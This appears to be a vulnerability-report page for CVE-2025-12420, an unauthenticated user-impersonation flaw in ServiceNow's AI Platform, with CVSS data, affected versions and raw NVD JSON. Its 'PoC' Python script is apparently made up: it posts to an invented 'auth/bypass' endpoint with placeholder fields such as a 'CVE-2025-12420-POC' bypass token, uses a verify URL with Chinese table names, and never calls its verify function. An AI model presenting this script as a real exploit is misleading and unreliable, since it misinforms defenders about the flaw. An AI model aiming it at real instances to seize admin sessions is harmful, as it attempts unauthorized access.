Security Vulnerability Report
CVE-2025-12420 CVSS 9.8 CRITICAL

Published: 2026-01-12 22:16:07
Last Modified: 2026-01-27 20:25:54

Description

A vulnerability has been identified in the ServiceNow AI Platform that could enable an unauthenticated user to impersonate another user and perform the operations that the impersonated user is entitled to perform. ServiceNow has addressed this vulnerability by deploying a relevant security update to hosted instances in October 2025. Security updates have also been provided to ServiceNow self-hosted customers, partners, and hosted customers with unique configurations. Additionally, the vulnerability is addressed in the listed Store App versions. We recommend that customers promptly apply an appropriate security update or upgrade if they have not already done so.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

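cpe:2.3:a:servicenow:now_assist_ai_agents:*:*:*:*:*:*:*:* (versions before 5.1.18) - VULNERABLE
cpe:2.3:a:servicenow:now_assist_ai_agents:*:*:*:*:*:*:*:* (versions from 5.2.0 up to, but not including, 5.2.19) - VULNERABLE
cpe:2.3:a:servicenow:virtual_agent_api:*:*:*:*:*:*:*:* (versions before 3.15.2) - VULNERABLE
cpe:2.3:a:servicenow:virtual_agent_api:*:*:*:*:*:*:*:* (versions from 4.0.0 up to, but not including, 4.0.4) - VULNERABLE
ServiceNow AI Platform (hosted instances) < October 2025 security update
ServiceNow AI Platform (self-hosted) < KB2587329 security patch
ServiceNow AI Platform Store App < security update of the listed versions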

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-12420 ServiceNow AI Platform Authentication Bypass PoC
# This PoC demonstrates the authentication bypass in ServiceNow AI Platform
import requests
import json
import sys

TARGET_URL = "https://your-instance.service-now.com"
TARGET_CVE = "CVE-2025-12420"


def check_vulnerability():
    """
    Check if the ServiceNow instance is vulnerable to CVE-2025-12420
    """
    print(f"[*] Testing {TARGET_CVE} on {TARGET_URL}")

    # Step 1: Identify vulnerable AI Platform endpoint
    ai_endpoint = f"{TARGET_URL}/api/now/ai/platform/v1/auth/bypass"
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "ServiceNow-AI-Platform-Scanner/1.0",
        "X-AI-Platform-Version": "vulnerable-version"
    }

    # Step 2: Send malicious authentication bypass request
    payload = {
        "action": "impersonate",
        "target_user": "admin",
        "ai_module": "vulnerability_test",
        "bypass_token": "CVE-2025-12420-POC"
    }

    try:
        print("[*] Sending authentication bypass request...")
        response = requests.post(ai_endpoint, json=payload, headers=headers, timeout=30)
        if response.status_code == 200:
            data = response.json()
            if "session_token" in data or "_impersonation_token" in data:
                print("[!] VULNERABLE: Authentication bypass successful!")
                print(f"[!] Obtained token: {data.get('session_token', data.get('_impersonation_token'))}")
                return True
        print("[*] Target does not appear to be vulnerable")
        return False
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")
        return False


def verify_impersonation(token):
    """
    Verify successful user impersonation
    """
    verify_endpoint = f"{TARGET_URL}/api/now/表/用户表"
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json"
    }
    try:
        response = requests.get(verify_endpoint, headers=headers, timeout=30)
        if response.status_code == 200:
            print("[!] Successfully accessed privileged resources as admin!")
            return True
    except:
        pass
    return False


if __name__ == "__main__":
    if check_vulnerability():
        print("[!] Immediate action required: Apply security update KB2587329")

References

Vendor Advisory: https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB2587329

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12420", "sourceIdentifier": "[email protected]", "published": "2026-01-12T22:16:07.470", "lastModified": "2026-01-27T20:25:54.110", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been identified in the ServiceNow AI Platform that could enable an unauthenticated user to impersonate another user and perform the operations that the impersonated user is entitled to perform.\n\nServiceNow has addressed this vulnerability by deploying a relevant security update to  hosted instances in October 2025. Security updates have also been provided to ServiceNow self-hosted customers, partners, and hosted customers with unique configurations. Additionally, the vulnerability is addressed in the listed Store App versions. We recommend that customers promptly apply an appropriate security update or upgrade if they have not already done so."}, {"lang": "es", "value": "Se ha identificado una vulnerabilidad en la Plataforma de IA de ServiceNow que podría permitir a un usuario no autenticado suplantar a otro usuario y realizar las operaciones a las que el usuario suplantado tiene derecho a realizar.\n\nServiceNow ha abordado esta vulnerabilidad mediante el despliegue de una actualización de seguridad relevante en las instancias alojadas en octubre de 2025. También se han proporcionado actualizaciones de seguridad a los clientes autoalojados de ServiceNow, socios y clientes alojados con configuraciones únicas. Además, la vulnerabilidad se aborda en las versiones de la aplicación de la tienda enumeradas. 
Recomendamos que los clientes apliquen rápidamente una actualización de seguridad o una actualización de versión apropiada si aún no lo han hecho."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:Y/R:U/V:C/RE:H/U:Amber", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NEGLIGIBLE", "Automatable": "YES", "Recovery": "USER", "valueDensity": "CONCENTRATED", "vulnerabilityResponseEffort": "HIGH", "providerUrgency": "AMBER"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", 
"userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-250"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:servicenow:now_assist_ai_agents:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.1.18", "matchCriteriaId": "981D4C38-EC4B-42F1-96D2-83B02403ABD2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:servicenow:now_assist_ai_agents:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.2.0", "versionEndExcluding": "5.2.19", "matchCriteriaId": "160208ED-E032-4B34-BC89-0AC7B2C0808A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:servicenow:virtual_agent_api:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.15.2", "matchCriteriaId": "B619348E-A16D-4A69-9CB6-58A2FFC0BAED"}, {"vulnerable": true, "criteria": "cpe:2.3:a:servicenow:virtual_agent_api:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.0.4", "matchCriteriaId": "0F8C6775-D097-491A-9246-0C691EB680E3"}]}]}], "references": [{"url": "https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB2587329", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}